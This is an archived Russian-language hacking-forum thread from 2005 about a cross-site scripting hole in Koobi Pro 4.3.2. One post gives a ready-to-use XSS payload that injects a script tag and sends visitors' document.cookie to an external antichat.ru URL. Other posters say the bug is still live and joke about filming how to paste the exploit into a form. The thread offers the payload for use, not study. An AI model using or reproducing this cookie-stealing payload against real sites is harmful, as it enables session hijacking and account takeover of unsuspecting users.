Просмотр полной версии : Межсайтовый скриптинг в koobi pro 4.3.2
Найденный уязвимость позволяет удаленныму пользователю своровать cookie пользователей.
Подробно читаем тут (http://csteam.ru/new7.html)
PS. Бага пока реально пашет . КЕЗ если есть возможность сними видео =))) Я не стал т.к потом наехали бы на мой проект ...
Mastermind
31.08.2005, 13:27
XSS:
"><script>i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;</script>
P.S. Только один вопрос: такой подход сработает во всех браузерах?
а может я сниму видео? можно Клез?)
GreenBear
02.09.2005, 23:29
да какое там видео... как в форму сплойт копировать...
И вправду какое там ещё видео делать.....
DRON-ANARCHY
03.09.2005, 13:47
И вправду какое там ещё видео делать.....Как какое? про то, какв форму сплойт копировать...
=)
как хотите)) а действительно чего сниматть то..
PinkPanther
03.09.2005, 22:44
Да Вы заИПали флеймить уже. Всех в бан )))
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot